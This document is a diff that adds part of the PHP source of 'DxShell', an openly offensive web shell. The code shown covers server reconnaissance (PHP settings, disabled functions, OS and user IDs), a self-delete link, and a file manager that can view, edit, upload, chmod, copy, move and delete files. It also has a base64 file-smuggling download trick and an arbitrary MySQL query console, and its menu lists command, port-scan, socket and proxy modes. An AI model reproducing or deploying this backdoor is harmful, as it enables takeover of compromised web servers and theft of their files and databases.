+print "\n".(  ($DXGLOBALSHIT)?'<font color=#FF0000><b>GLOBALSHIT</b></font> ; ':''  );
+print "\n".DxPrint_ParamState('php_ver', 		phpversion()						).' ; ';
+print "\n".DxPrint_ParamState('php_Safe_Mode', 	$GLOB['PHP']['SafeMode'], '!'		).' ; ';
+print "\n".DxPrint_ParamState('magic_quotes', 	(bool)get_magic_quotes_gpc(), '!'	).' ; ';
+print "\n".DxPrint_ParamState('gZip', 			function_exists('gzencode')			).' ; ';
+print "\n".DxPrint_ParamState('cURL', 			function_exists('curl_version')		).' ; ';
+print "\n".DxPrint_ParamState('MySQL', 			function_exists('mysql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('MsSQL', 			function_exists('mssql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('PostgreSQL', 	function_exists('pg_connect')		).' ; ';
+print "\n".DxPrint_ParamState('Oracle', 		function_exists('ocilogon')			).' ; ';
+print "\n".'Disabled functions: '.((($df=@ini_get('disable_functions'))=='')?'<font color=#00FF00><b>NONE</b></font>':'<font color=#FF0000><b>'.str_replace(array(',',';'), ', ', $df).'</b></font>');
+print "\n".'</div>';
+
+print "\n\n".'<span align=right style="position:absolute;z-index:1;right:0pt;top:0pt;"><table><tr><td class="h2_oneline"><nobr>';
+if ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)
+	print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=logoff" title="Log Off" class=no>[Exit]</a>';
+print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=DEL" title="Delete self ('.basename($_SERVER['PHP_SELF']).')" class=no><font color=#FF0000;>'.DxImg('del').'</font></a>';
+print "\n".'</nobr></td></tr></table></span>';
+
+print "\n\n".'<hr>';
+print "\n".'Disk free: <b>'.DxStr_FmtFileSize(disk_free_space($GLOB['FILES']['CurDIR'])).' / '.DxStr_FmtFileSize(disk_total_space($GLOB['FILES']['CurDIR'])).'</b> ; ';
+print "\n".'OS: <b>'.$GLOB['SYS']['OS']['id'].' ('.$GLOB['SYS']['OS']['Full'].' )</b> ; ';
+print "\n".'Yer_IP: <b>'.@$_SERVER['REMOTE_ADDR'].' ('.@$_SERVER['REMOTE_HOST'].')</b> ; ';
+print "\n".'<nobr>Own/U/G/Pid/Inode:<wbr><b>'.get_current_user().' / '.getmyuid().' / '.getmygid().' / '.getmypid().' / '.getmyinode().'</b> ; </nobr>';
+print "\n".'MySQL : <b>'.@mysql_get_server_info().'</b> ; ';
+print "\n".'<br>'.@$_SERVER['SERVER_SOFTWARE'];
+?>
+	</td>
+</table>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><h2>Modes</td>
+	<td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=DIR">DIR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=F_VIEW">VIEW</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=FTP<?=((!empty($_GET['dxdir']))?'&dxdir='.$_GET['dxdir']:'');?>">FTP</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('leave', 'dxsql_s,dxsql_l,dxsql_p,dxsql_d');?>&dxmode=SQL">SQL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PHP">PHP</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=COOK">COOKIE</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=CMD">CMD</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=MAIL">MAIL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=STR">STR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PRT">PORTSCAN</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=SOCK">SOCK</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PROX">PROXY</a>
+	</td>
+	</tr>
+</table>
+
+<?php $DX_Header_drawn=true; ?>
+
+<?php
+#################################################
+########
+########   DXGLOBALSHIT DOWNLOADER
+########
+if (isset($DxDOWNLOAD_File)) /* only when DXGLOBALSHIT is enabled */
+	{	print "\n".'<table align=center><tr><td class=mode_header><b>Download file</td></tr></table>';
+	print "\n".'The fact you see this means that "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit, so no headerz could be sent =((';
+	print "\n".'<br>Exclusively, DxShell is proud to present an additional way to download files...Just execute the php-script given below, and it will make the file u\'re trying to download';
+
+	if ($GLOB['SYS']['GZIP']['CanUse'])  $DxDOWNLOAD_File['content']=gzcompress($DxDOWNLOAD_File['content'], 6);
+
+	print "\n\n".'<br><br>';
+	print "\n".'<textarea rows=30 style="width:90%" align=center>';
+	print "\n".'<?php'."\n".' //Execute this, and you\'ll get the requested "'.$DxDOWNLOAD_File['filename'].'" in the same folder with the script ;)';
+	print "\n".'// The file is '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzcompress()ed and':''  ).' base64_encode()ed';
+	print "\n\n".'$encoded_file=\''.base64_encode($DxDOWNLOAD_File['content']).'\';';
+	print "\n\n\n\n";
+	print "\n".'$f=fopen(\''.$DxDOWNLOAD_File['filename'].'\', \'w\');';
+	print "\n".'fputs($f, '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzuncompress(base64_decode($encoded_file))':'base64_decode($encoded_file)'  ).');';
+	print "\n".'fclose($f);';
+	print "\n".'//Yahoo, hacker, the file is here =)';
+	print "\n".'?>';
+	print "\n".'</textarea>';
+	die();
+	}
+
+?>
+
+<table align=center>
+	<tr><td class=mode_header>
+	@MODE: <b><?=$GLOB['DxMODES'][$_GET['dxmode']];?>
+	</td></tr></table>
+<?
+
+########
+########   AboutBox
+########
+if ($_GET['dxmode']=='WTF')
+	{
+	?>
+<table align=center class=nooooneblya><tr><td><div align=center>
+<?php
+print '<a href="http://hellknights.void.ru/">'.DxImg('exec').'</a>';
+print '<br>o_O Tync, ICQ# 1227-700';
+?><br><br>
+<textarea name="LolBox" class=bout style="width:500pt; height:500pt;"></textarea></table>
+<SCRIPT language=Javascript><!--
+var tl=new Array(
+"Kilobytes of c0de, litres of beer, kilometers of cigarettes (*no drugs*), and for what purpose?",
+"What's wrong with other shells?",
+"Usability, functionality, bugs?... NO.",
+"The main bug is: these shells ARE NOT mine =)",
+"Just like to be responsible for every motherfucking byte of code.",
+"Enjoy!",
+"-----------------------------------",
+"o_O Tync, http://hellknights.void.ru/, ICQ# 1227-700",
+"DxShell v<?=$GLOB['SHELL']['Ver'].', date '.$GLOB['SHELL']['Date'];?>",
+"",
+"Greetz to: ",
+"iNfantry the Ruler",
+"Nik8 the Hekker",
+"_1nf3ct0r_ the Father",
+"Industry of Death the betatest0r =)",
+"",
+"Thanks to:",
+"Dunhill the cigarettes, Tuborg the beer, PHP the language, Nescafe the Coffee, Psychedelic the Music",
+"",
+"Wartime testers & debuggers ::: =))) :::",
+"MINDGROW",
+"BELLFAGOR",
+"",
+"",
+"Hekk da pl0net!",
+"--- EOF ---"
+);
+var speed=40;var index=0; text_pos=0;var str_length=tl[0].length;var contents, row;
+function type_text()
+{contents='';row=Math.max(0,index-50);
+while(row<index) contents += tl[row++] + '\r\n';
+document.getElementById("LolBox").value = contents + tl[index].substring(0,text_pos)+'|';
+if(text_pos++==str_length)
+	{text_pos=0;index++;
+	if(index!=tl.length)
+	{str_length=tl[index].length;setTimeout("type_text()",1000);
+	}
+	} else setTimeout("type_text()",speed);
+}type_text();
+//-->
+</SCRIPT>
+	<?php
+	}
+
+
+		###################################
+
+########
+########   Upload file
+########
+if ($_GET['dxmode']=='UPL')
+	{
+	if (empty($_POST['dxdir']) AND empty($_GET['dxdir'])) die(DxError('Uploading without selecting directory $_POST/$_GET[\'dxdir\'] is restricted'));
+
+	if (isset($_FILES['dx_uplfile']['tmp_name']))
+		{
+		$GETFILE=file_get_contents($_FILES['dx_uplfile']['tmp_name']);
+		DxFiles_UploadHere($_POST['dxdir'], $_FILES['dx_uplfile']['name'], $GETFILE);
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave','dxmode,dxsimple').'" enctype="multipart/form-data" method=POST>';
+		print "\n".'<input type="hidden" name="MAX_FILE_SIZE" value="'.$GLOB['PHP']['upload_max_filesize'].'">';
+		print "\n".'<font class="highlight_txt">Max: '.DxStr_FmtFileSize($GLOB['PHP']['upload_max_filesize']).'</font>';
+		print "\n".'<br><input type=text name="dxdir" value="'.$_GET['dxdir'].'" SIZE=50>';
+		print "\n".'<br><input type=file name="dx_uplfile" SIZE=50>';
+		print "\n".'<input type=submit value="Upload" class="submit"></form>';
+		}
+	}
+
+		###################################
+
+########
+########   Directory listings
+########
+if ($_GET['dxmode']=='DIR')
+	{
+	if (empty($_GET['dxdir'])) $_GET['dxdir']=realpath($GLOB['FILES']['CurDIR']);
+	$_GET['dxdir']=DxFileOkaySlashes($_GET['dxdir']);
+	if (substr($_GET['dxdir'], -1,1)!='/') $_GET['dxdir'].='/';
+
+	print "\n".'<br><form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+	DxGETinForm('leave', 'dxmode');
+	print "\n".'<input type=text name="dxdir" value="'.DxFileOkaySlashes(realpath($_GET['dxdir'])).'" SIZE=40>';
+	print "\n".'<input type=submit value="Goto" class="submit"></form>';
+
+	print "\n".'<br>'.'<b>&gt;&gt; <b>'.$_GET['dxdir'].'</b>';
+	if (!file_exists($_GET['dxdir'])) die(DxError('No such directory'));
+	if (!is_dir($_GET['dxdir'])) 	  die(DxError('It\'s a file!! What do you think about listing files in a file? =)) '));
+
+	if (isset($_GET['dxparam']))
+		{		if ($_GET['dxparam']=='mkDIR')  if (	!mkdir($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkDir. Perms?');
+		if ($_GET['dxparam']=='mkFILE') if (	!touch($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkFile. Perms?');
+		}
+
+	if (!($dir_ptr=opendir($_GET['dxdir']))) die(DxError('Unable to open dir for reading. Perms?...'));
+	$FILES=array('DIRS' => array(), 'FILES' => array());
+	while (!is_bool( $file = readdir($dir_ptr)  ) )
+		if (($file!='.') and ($file!='..'))		if (is_dir($_GET['dxdir'].$file)) $FILES['DIRS'][]=$file; else $FILES['FILES'][]=$file;
+	asort($FILES['DIRS']);asort($FILES['FILES']);
+
+	print "\n".'<span style="position:absolute;right:0pt;">';
+	if (isset($_GET['dxdirsimple']))	print '<a href="'.DxURL('kill', 'dxdirsimple').'">[Switch to FULL]</a>';
+		else					print '<a href="'.DxURL('leave', '').'&dxdirsimple=1">[Switch to LITE]</a>';
+	print '</span>';
+
+	$folderup_link=explode('/',$_GET['dxdir'].'../');
+	if (!empty($folderup_link[   count($folderup_link)-3   ]) AND ($folderup_link[   count($folderup_link)-3   ]!='..'))
+		unset($folderup_link[   count($folderup_link)-3   ], $folderup_link[   count($folderup_link)-1   ]);
+	$folderup_link=implode('/', $folderup_link);
+	print "\n".str_repeat('&nbsp;',3).'<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.$folderup_link.'" class=no>'
+						.DxImg('foldup').' ../</a>';
+
+	print "\n".str_repeat('&nbsp;', 15).'<font class=highlight_txt>MAKE: </font>'
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkDIR">Dir</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkFILE">File</a>'
+		.' / '.str_repeat('&nbsp;',5)
+		.'<font class=highlight_txt>UPLOAD: </font>'
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">Form</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">FTP</a>'
+		;
+
+	print "\n".'<br>'.count($FILES['DIRS']).' dirs, '.count($FILES['FILES']).' files ';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 ><COL span=15 class="linelisting">';
+	for ($NOWi=0;$NOWi<=1;$NOWi++)
+		for ($NOW=($NOWi==0)?'DIRS':'FILES', $i=0;$i<count($FILES[$NOW]);$i++)
+			{			$cur=&$FILES[$NOW][$i];
+			$dircur=$_GET['dxdir'].$cur;
+			print "\n".'<tr>';
+			print "\n\t".'<td class=linelisting '.((isset($_GET['dxdirsimple']) AND ($NOW=='DIRS'))?'colspan=2':'').'>'
+							.(($NOW=='DIRS')?DxImg('folder').' '
+							.				 '<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.DxFileToUrl($dircur).'" class=no>':'')
+							.(($NOW=='FILES')?'<a href="'.DxURL('kill', '').'&dxmode=F_VIEW&dxfile='.DxFileToUrl($dircur).'" class=no>':'')
+							.htmlspecialchars($cur).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				print "\n\t".'<td class=linelisting>'
+					.'<span '.DxDesign_DrawBubbleBox('File Info',    '<b>Create time:</b><br>'.DxDate(@filectime($dircur)).'<br>'
+															 		.'<b>Modify time:</b><br>'. DxDate(@filemtime($dircur)).'<br>'
+															 		.'<b>Owner/Group:</b><br>'.(@fileowner($dircur)).' / '.(@filegroup($dircur))
+															 		, 150).' class=Hover><b>INFO</span> </td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=2':'').'>'
+					.((($i+$NOWi)==0)?'<span '.DxDesign_DrawBubbleBox('Perms legend', '1st: sticky bit:<br>"<b>S</b>" Socket, "<b>L</b>" Symbolic Link, "<b>&lt;empty&gt;</b>" Regular, "<b>B</b>" Block special, "<b>D</b>" Directory, "<b>C</b>" Character special, "<b>P</b>" FIFO Pipe, "<b>?</b>" Unknown<br>Others: Owner/Group/World<br>"<b>r</b>" Read, "<b>w</b>" Write, "<b>x</b>" Execute<br><br><b>Click to CHMOD', 400).' class=Hover>':'')
+					.'<a href="'.DxURL('kill', '').'&dxmode=F_CHM&dxfile='.DxFileToUrl($dircur).'" class=no>'.DxChmod_Oct2Str(@fileperms($dircur)).'</td>';
+				}
+
+			if ($NOW!='DIRS') print "\n\t".'<td class=linelisting style="text-align:right;">'.DxStr_FmtFileSize(@filesize($dircur)).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				if ($NOW=='DIRS') print "\n\t".'<td class=linelisting colspan='.(($GLOB['SYS']['GZIP']['IMG'])?'4':'3').'>&nbsp;</td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($dircur).'" target=_blank>'.DxImg('view').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($dircur).'">'.DxImg('ed').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('downl').'</a></td>';
+				if (($NOW!='DIRS') AND ($GLOB['SYS']['GZIP']['IMG'])) print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dx_gzip=Yeah&dxfile='.DxFileToUrl($dircur).'">'.DxImg('gzip').'</a></td>';
+				print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_REN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('rename').'</a></td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=3':'').'><a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($dircur).'">'.DxImg('del').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_COP&dxfile='.DxFileToUrl($dircur).'">'.DxImg('copy').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_MOV&dxfile='.DxFileToUrl($dircur).'">'.DxImg('move').'</a></td>';
+				}
+			print "\n\t".'</tr>';
+			}
+	print "\n".'</table>';
+	}
+
+
+########
+########   File Global Actions
+########
+if ('F_'==substr($_GET['dxmode'],0,2))
+	{	if (empty($_GET['dxfile']))
+		{		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=text name="dxfile" value="" style="width:70%;">';
+		print "\n".'<br><input type=submit value="Select" class="submit">';
+		print "\n".'</form>';
+		}
+	if (!file_exists(@$_GET['dxfile']))  die(DxError('No such file'));
+	print "\n\n".'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+########
+########   File CHMOD
+########
+if ($_GET['dxmode']=='F_CHM')
+	{
+	if (isset($_GET['dxparam']))
+		{		if (chmod($_GET['dxfile'], octdec((int)$_GET['dxparam']))==FALSE)
+			print DxError('Chmod "'.$_GET['dxfile'].'" failed');
+			else print 'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</b></font> )...<b>OK</b>';
+		}
+		else
+		{		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</font> )';
+		print "\n".'<br><input type=text name="dxparam" value="'.
+			//decoct(fileperms($_GET['dxfile']))
+			substr(sprintf('%o', fileperms($_GET['dxfile'])), -4)
+			.'">';
+		print "\n".'<input type=submit value="chmod" class="submit"></form>';
+		}
+	}
+
+########
+########   File View
+########
+if ($_GET['dxmode']=='F_VIEW')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=right><tr>';
+	print "\n".'<td><h3>'.$_GET['dxfile'].'</h3></td>';
+	print "\n".'<td>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'" target=_blank>'.DxImg('view').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('ed').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('downl').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('del').'</a>'
+		.'</td>';
+	print "\n".'</tr></table><br>';
+	print "\n".'Tip: to view the file "as is" - open the page in <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'">source</a> (<i>works best in Opera</i>), or <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">download</a> this file';
+
+	print "\n\n\n".'<br><hr><!-- File contents goes from here -->'."\n";
+	print "\n".'<plaintext>';
+	print file_get_contents($_GET['dxfile']);
+	die(); /* Plaintext is infinite */
+	}
+
+########
+########   File Edit
+########
+if ($_GET['dxmode']=='F_ED')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (isset($_POST['dxparam']))
+		{		if (!is_writable($_GET['dxfile']))  die(DxError('File is not writable. Perms?...'));
+		if (($f=fopen($_GET['dxfile'], 'w'))===FALSE) die(DxError('File open for WRITE failed'));
+		if (fputs($f, $_POST['dxparam'])===FALSE)	die(DxError('I/O: File write failed'));
+		fclose($f);
+		print 'File saved OK;';
+		}
+		else
+		{
+		if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');		print "\n".'<font class=highlight_txt>'.$_GET['dxfile'].'</font>';
+		print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+		print "\n".'<textarea name="dxparam" rows=30 style="width:90%;">'.str_replace(array('<','>'),array('&lt;','&gt;'), file_get_contents($_GET['dxfile'])).'</textarea>';
+		print "\n".'<br><input type=submit value="Save" style="width:100pt;height:50pt;font-size:15pt;" class=submit>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Delete
+########
+if ($_GET['dxmode']=='F_DEL')
+	{		if (isset($_GET['dx_ok']))
+			{		if ($_GET['dx_ok']=='Yes')
+			{			if (	(is_file($_GET['dxfile']) AND !unlink($_GET['dxfile']))  OR  (is_dir($_GET['dxfile']) AND !rmdir($_GET['dxfile']))		)
+				print DxError('Unable to delete file. Perms?...<br>');
+				else
+				{				print "\n".'Delete( <font class=highlight_txt>'.$_GET['dxfile'].'</font> ) <b>OK</b>';
+				DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+				}
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><tr><td>'
+					."\n".'<font class=achtung>(!)</font> Do you really want to <font class=highlight_txt>DELETE '.$_GET['dxfile'].'</font> ?'
+					."\n".'<div align=right><input type=submit name="dx_ok" value="No" class=bt_No><input type=submit name="dx_ok" value="Yes" class=bt_Yes>'
+					."\n".'</td></tr></table>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Rename
+########
+if ($_GET['dxmode']=='F_REN')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], dirname($_GET['dxfile']).'/'.$_POST['dxparam']))
+			print DxError('Unable to rename. Perms?...<br>');
+			else
+			{
+			print "\n".'Rename( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.dirname($_GET['dxfile']).'/'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+			}
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.basename($_GET['dxfile']).'" style="width:80%">';
+		print "\n".'<input type=submit value="Rename" class="submit"></form>';
+		}
+	}
+
+########
+########   File Copy
+########
+if ($_GET['dxmode']=='F_COP')
+	{
+	if (!is_file($_GET['dxfile'])) die(DxError('Don\'t even think about copuing directories! =))'));
+
+	$newname=$_GET['dxfile'].'__DxS_COPY_'.DxRandomChars(3);
+	if (($extpos=strrpos($_GET['dxfile'], '.'))>strrpos($_GET['dxfile'], '/')) /* file has an extension */
+		$newname=substr($_GET['dxfile'], 0, $extpos).'__DxS_COPY_'.DxRandomChars(3).substr($_GET['dxfile'], $extpos);
+	print $newname;
+	if (!copy($_GET['dxfile'], $newname))
+		print DxError('Unable to copy. Perms?...<br>');
+		else
+		{
+		print "\n".'Copy( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$newname.'</font> ) <b>OK</b>';
+		DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+		}
+	}
+
+########
+########   File Move
+########
+if ($_GET['dxmode']=='F_MOV')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], $_POST['dxparam']))
+			print DxError('Unable to rename. Perms? Or no path?...<br>');
+			else
+			{
+			print "\n".'Move( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_POST['dxparam'])));
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.DxFileOkaySlashes(realpath($_GET['dxfile'])).'" style="width:80%">';
+		print "\n".'<input type=submit value="M0ve" class="submit"></form>';
+		}
+	}
+
+if (substr($_GET['dxmode'],0,2)=='F_')
+	{/* file actions */
+	print "\n\n".'<br><br>'.'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+		###################################
+
+########
+########   SQL Maintenance
+########
+if ($_GET['dxmode']=='SQL')
+	{	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p']))
+		{		print "\n".'<h2>MySQL connection</h2>';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET align=center>';
+		DxGETinForm('leave', 'dxmode');
+		print "\n".'<br>Serv: <input type=text name="dxsql_s" value="localhost" style="width:200pt">';
+		print "\n".'<br>Login:<input type=text name="dxsql_l" value="" 	 	style="width:200pt">';
+		print "\n".'<br>Passw:<input type=password name="dxsql_p" value="" 	style="width:200pt">';
+		print "\n".'<br><input type=submit value="C0nnect" class="submit" style="width:200pt;"></form>';
+		die();
+		}
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	$mysqlver=mysql_fetch_row(mysql_query("SELECT VERSION()"));
+	print str_repeat('&nbsp;',15).'MySQL version: <font class="highlight_txt">'.$mysqlver[0].'</font>';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW DATABASES;', true), $DATABASES, true);
+	for ($i=0;$i<count($DATABASES);$i++)
+		$DATABASES[$i][1]=mysql_num_rows(DxMySQLQ('SHOW TABLES FROM `'.$DATABASES[$i][0].'`;', false));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0>'
+				.'<tr><td class=h2_oneline><h1>DB:</h1></td>';
+	if (!isset($_GET['dxsql_d']))
+		{
+		print "\n".'<td class=h2_oneline style="border-width:0pt;">';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxsql_s,dxsql_l,dxsql_p');
+		print "\n".'<SELECT name="dxsql_d" onchange="this.form.submit()">';
+		print "\n\t".'<OPTION value="">&lt;Server&gt;</OPTION>';
+		for ($i=0;$i<count($DATABASES);$i++)
+		print "\n\t".'<OPTION value="'.$DATABASES[$i][0].'">'
+			.'['.DxZeroedNumber($DATABASES[$i][1],3).']'.' '.$DATABASES[$i][0]
+			.'</OPTION>';
+		print "\n".'</SELECT><input type=submit value="-&gt;" class=submit"></form></td>';
+		print "\n".'</tr></table>';
+		die();
+		}
+		else print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxsql_d').'" class=no>[CH]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLS" class=no>[Search in tables...]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLD" class=no>[Dump...]</a></td>'
+						.'</tr></table>';
+
+	if (!empty($_GET['dxsql_d']))
+		if (!mysql_select_db($_GET['dxsql_d']))
+			die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+	if (!empty($_GET['dxsql_d']))
+		{
+		print "\n\t".'<table  border=0 cellspacing=0 cellpadding=0>';
+		print "\n\t".'<caption>Tables:</caption>';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+		for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+		asort($TABLES);
+		for ($i=0;$i<count($TABLES);$i++)
+			{
+			DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);			print "\n\t".'<tr><td class="listing"><nobr>'.(($TRowCnt[0][0]>0)?'&gt; ':'&nbsp;&nbsp;').$TABLES[$i].'</td></tr>';
+			}
+		print "\n\t".'</table>';
+		}
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'[?] Can run several querys if divided by ";"<br>If smth is wrong with charset, write first: SET NAMES cp1251;';
+	print "\n".'<textarea name="dxsql_q" rows=10 style="width:100%;">'.((empty($_POST['dxsql_q']))?'':$_POST['dxsql_q']).'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Query" class="submit"> '
+				.'<input type=submit name="dxparam" value="Download Query" class="submit"></div></form>'
+				.'<br>';
+
+	if (empty($_POST['dxsql_q'])) die('</td></tr></table>');
+	$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+
